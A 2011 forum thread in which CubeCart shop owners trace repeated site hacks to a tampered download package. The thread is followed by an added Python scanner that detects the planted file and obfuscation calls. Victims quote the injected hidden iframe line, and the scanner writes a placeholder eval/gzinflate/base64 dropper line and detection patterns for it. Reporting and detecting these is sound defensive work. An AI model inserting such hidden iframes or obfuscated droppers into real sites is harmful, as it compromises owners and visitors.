Guest Zomnut, posted February 5, 2011: Website hacked again last night. Looking through the access_logs uncovered something very unsettling. Al, sending you a PM for security reasons.
Guest, posted February 6, 2011: I bet you have a bot on your system that's gleaning your FTP passwords and usernames. Change them from a different machine and you will find they can't get access, which means changing your usernames and hunting down the virus, and not storing your usernames and p/ws for FTP programs on your machine till you have found it.
Dodgebill, posted February 6, 2011: I have looked at my logs and can't find any FTP access to my site when it got hacked. I changed my password (from another machine) and still got hacked again. The only FTP access to my site came from my IP, and I have kept track of when I log in and it's all right there with nothing else going on. It's just not adding up.
havenswift-hosting, posted February 6, 2011: As I have said several times before, there are any number of ways that this type of problem can be caused, so focusing on only one is not going to solve your problem! Unless it is your own dedicated or VPS server, you will not be looking at the server access log unless your host has provided these, which is extremely unlikely. Also, just because you have used another PC, what is to say that this one isn't infected with the same problem (if this is indeed the method they are getting in; it is only one possibility!)
Robsta, posted February 6, 2011: If it's so predictable that your files are getting altered, can't your hosting company monitor your account for access?
Dodgebill, posted February 6, 2011: It's not that predictable. I went 4 days this week without a hack and then got hit 3 times yesterday.... They found a way around all the measures used to stop it and got back in, I guess. Does anyone know where the kids get their info on hacking? Might help us figure out how they are doing it. I did notice that files I had deleted were restored. The dates/times all matched the other files. Almost like the host did a backup or something. Might explain why it's coming back so often.
Robsta, posted February 6, 2011: I meant predictable in that you will be hacked. This can't be CubeCart. You need to get your hosting company more involved, otherwise you will go round in circles.
havenswift-hosting, posted February 6, 2011: For those of you still getting this problem, getting your host involved to diagnose the source of your specific problem and help you plug the security issue is the ONLY way. If they are unwilling or unable, then move to a different host! As much as I and others would like to help further, if you have followed the various advice already given, then nobody on here is going to be able to help any further without server-level access or very specific proof that CubeCart is the cause (which I personally believe to be a very small possibility). Ian
Guest Zomnut, posted February 6, 2011: To be clear, but attempting to be responsible in the public sphere: in investigating the break-in on my website I found a security hole in CubeCart. In the interest of not having the hole get blown open so anyone reading this forum can freely exploit ANYONE's CubeCart installation, I have reported the exploit to Al so the CubeCart team can fix it and stay in control of the situation.
Dodgebill, posted February 6, 2011: I hope there is a speedy resolution to this issue now that the cause has been found. Thanks for all your help, Zomnut. I am very put off by the lack of consideration the so-called experts gave to this issue. Not very professional, in my opinion. I have come to expect better from this group.
havenswift-hosting, posted February 6, 2011: Well, as nobody else has seen what this "cause of the exploit" is, it is extremely difficult for anyone else to comment. Even if it is an exploit in CubeCart, it isn't necessarily the same reason that other people are having this problem. ANY website (not just CubeCart) can be open to this type of problem, so let's just wait and see what Al has to say tomorrow. Still strange that of the tens if not hundreds of thousands of CubeCart 3 sites that are out there, there have been relatively few affected! Also, apart from Al who owns CubeCart, everyone else on these forums offers their help and advice completely free, in their own time and without charge. To say that people have been unprofessional and that they have given a lack of consideration to this problem is rude and insulting! The alternative to getting free support on these forums from professionals and other experienced end users is for you to pay for CubeCart support, either directly from CubeCart themselves or from one of the other companies that offer this service. Ian
Guest Shipz, posted February 6, 2011: Hi guys. I have been following this thread over the last few days as I have been a victim of this too. I am no expert in such matters and look to these forums for guidance and advice, as I guess many people do. There are probably a larger number of people viewing than contributing to this thread, or even people who are unaware that their site is experiencing problems. The advice posted has been very welcome and appreciated. I guess most people, me included, never expected to be so tied up in website / server running. Initially I got the code placed into the index.php and the jslibrary.js files. I resorted to restoring to a previously saved backup. Changed passwords and permissions. Contacted my host, who tells me they use suPHP on their servers (I use Just Host for the record). I have changed the permissions on the js files to 0444. However, my anti-virus picked up a threat a couple of days ago called JS:Downloader - ALQ[Trj]. I have tried doing a search to try and find what this was but I couldn't find much on it. However, looking at the name of the thing, it sort of points to it being something that may well be associated with this problem. Or am I totally wrong? The thing is, it wasn't picked up until a few days ago and I do a scan every day, so if it had been there when I first experienced this problem then I would have expected it to have been found earlier. After finding and quarantining it I did a full virus and malware scan and found nothing else. Yesterday I checked my site and I found that it had again been attacked. This time I was getting a parse error screen on the index.php file. I went through the file and found the following line of code: <iframe src="http://free-counter.biz.ly" width=1 height=1 frameborder-0></iframe> I removed this line and we were back in business. I have no idea how this was added as I thought I had done all the steps mentioned in this thread.
Not sure this will help anybody, but just thought I would add my experience with this problem to date. I look forward to following this thread and hope a definitive resolution is found. And guys, be nice to one another; it's frustrating, I know, but without the help on these forums I wouldn't know where to start.
Guest valtam, posted February 7, 2011: As a precaution, with the best interests of my client at the fore, I have contacted our host and asked them to move us to another machine. They can no longer afford to risk using the same machine, or the same software, as people here can't seem to agree on what is the root cause. I will no longer use CubeCart as a precaution until it is crystal clear as to what is going on here. By the way, my index.php file was changed to <iframe src="http://free-counter.biz.ly" width=1 height=1 frameborder-0></iframe> on 5/2/11 at around 11pm Sydney time as well. So my initial fears are realised: they are simply sitting on this and exploiting it at will. Bastards. What would happen if we changed all the permissions of everything to 444?
Al Brookbanks, posted February 7, 2011: CHMOD to 0444 for everything should be OK so long as the image folders and cache are writable. It depends on how your hosting is configured.
Al Brookbanks, posted February 7, 2011: Zomnut found something in the access logs which is suspicious. This file has been found in the 3.0.20 package hosted on our server. We are looking into how and why. It could be that the download file was hacked on our server somehow. Our server is scanned daily for exploits by McAfee Secure and has a PCI certification, so in theory it is very secure. Please can you all check for the existence of the following file: /images/random/chars/T.php If it exists please let me know and be sure to delete it.
Guest Shipz, posted February 7, 2011: I've just checked and I do have a T.php file in the location you reported. However, I have just checked my CubeCart unzipped folder I have here on my local PC and noticed that file was in there also. This unzipped version is a copy of the original files which I have been using to work out where code has been changed in the hacked ones. If it shouldn't be there, how come it is in the original files supplied? What is it doing? Probably daft questions, but like I said earlier I am no expert on such things. Valtam, sorry to hear you had the same problem as me; just wondering if anyone else experienced the same thing around the same time? Thanks
Al Brookbanks, posted February 7, 2011: I think that the zip folder hosted on our server somehow got hacked. It has been replaced since 9:25 this morning with a cleaned one. It has been scanned for any instances of bad JavaScript or PHP 'eval' functions and it is fine now.
Guest Shipz, posted February 7, 2011: Hey Al, so the T.php file is definitely not part of the CC code, and I can delete it? The zip folder I unzipped was the folder I downloaded when I first started getting to grips with CC, which would have been back in November last year. If that's the case then that file must have been there a long time. Any ideas as to what that file was doing?
Al Brookbanks, posted February 7, 2011: Please delete the file. It should not be in the package and plays no part in CubeCart at all. The code is obfuscated, meaning it can't be read easily. I haven't obfuscated it yet but it's fairly sizeable.
Dodgebill, posted February 7, 2011: I downloaded my copy of CC3.0.20 back in September and it has the file. This has been going on for a while, I guess..... It is not in the download package of 3.0.18 I had, and one of my stores that did get hacked was using that. That site does not have the T.php file on it and never has, but has been hacked a lot.
Dodgebill, posted February 7, 2011: Ian, please reread the post I made and then a few of your own and tell me I was wrong in any way. I know 99.9999% of the users are unpaid. We all know that.
CubeCart is the one place anyone can go and ask for help and the 'cool kids' don't beat you up for it. At least it used to be....
havenswift-hosting, posted February 7, 2011: The version of 3.0.20 that I have and have used for clients was downloaded 16th Sept 2010 and doesn't have that file. No CubeCart V3 sites on our servers have been hacked. I have been told of two other websites (not CubeCart but html / php / js) that have had the same code injection problem, so while this may be a possible solution for some, there are still other problems causing this. The trojan that was previously mentioned is also one possible way. Ian
Al Brookbanks, posted February 7, 2011: For now the only recommendation we can have is to delete the T.php file if it exists. There are no other known security holes. Our helpdesk software that stores the v3.0.20 files has been updated recently, so we expect any exploits have been patched. We know that all server software is up to date and configured to McAfee's recommendations, so we can't do any more than that. I'm really very sorry you have experienced this issue.
bsmither, posted February 7, 2011: Versions 17, 18, and 19 were downloaded late October 2010 and have altered files (yes, plural). Honest disclaimer: when I saw and decoded the anomaly in /install/index.php, I just thought Devellion was being a (not very complimentary word). The anomaly determines your server host and emails it to a gmail account. I discovered this Nov 12, 2010. I am so sorry I didn't call Devellion out on this. The other anomalies found in the zip files downloaded October 27, 2010 are: /language/nl/lang.inc.php and /includes/boxes/siteDocs.php.
Al Brookbanks, posted February 7, 2011: OK, so it seems that the package on our server has been interfered with. I have temporarily taken it offline pending investigation. A number of files have had code added to them. I am in the process now of scanning for instances of 'eval', 'base_64' and 'gzinflate'. I'll release a full report ASAP and put the 3.0.20 package up again. We will then rerelease it with an MD5 signature so that it can be verified prior to future installations.
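For store owners wanting to run the two checks Al describes above on their own extracted package (look for the stray T.php, grep for the obfuscation calls, and compare the download against a published digest), here is an added example; it is not CubeCart project code. It assumes 'base_64' in the post refers to PHP's base64_decode(), and the sample package it builds is constructed in a temp directory with a placeholder payload.

```python
"""Integrity checks for an extracted CubeCart package (added example)."""
import hashlib
import os
import re
import tempfile

# The stray file named in this thread; a clean package must not contain it.
UNEXPECTED_FILES = {"images/random/chars/T.php"}

# Constructs Al is grepping for. 'base64_decode' is assumed to be what the
# post's 'base_64' means. Legitimate code can use these too, so a hit is a
# lead to review by hand, not proof of tampering.
SUSPICIOUS = re.compile(r"\b(eval|base64_decode|gzinflate)\s*\(", re.IGNORECASE)
SCAN_EXTENSIONS = (".php", ".js")


def scan_tree(root):
    """Walk an extracted package; return sorted (relative path, reason) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if rel in UNEXPECTED_FILES:
                findings.append((rel, "unexpected file"))
            if rel.endswith(SCAN_EXTENSIONS):
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    hits = sorted({m.group(1).lower() for m in SUSPICIOUS.finditer(fh.read())})
                if hits:
                    findings.append((rel, "suspicious call(s): " + ", ".join(hits)))
    return sorted(findings)


def digest_of(path, algo="md5"):
    """Hex digest of a file, read in chunks. MD5 is what the thread proposes;
    prefer sha256 where the vendor publishes one."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_digest(path, expected_hex, algo="md5"):
    """True only if the download matches the published digest exactly."""
    return digest_of(path, algo) == expected_hex.strip().lower()


def build_demo_tree():
    """Constructed sample package: one clean file, one planted dropper shell."""
    root = tempfile.mkdtemp(prefix="cc_pkg_")
    planted = {
        "index.php": "<?php require 'includes/global.inc.php'; ?>\n",
        # Constructed stand-in for the obfuscated file; payload is a placeholder.
        "images/random/chars/T.php": "<?php eval(gzinflate(base64_decode('PLACEHOLDER'))); ?>\n",
    }
    for rel, body in planted.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, reason in scan_tree(build_demo_tree()):
        print(f"{rel}: {reason}")
```

Point scan_tree() at the folder you unzipped the download into; a hit in a file the package is supposed to ship (as bsmither reports for /install/index.php) still needs a manual diff against a known-clean copy.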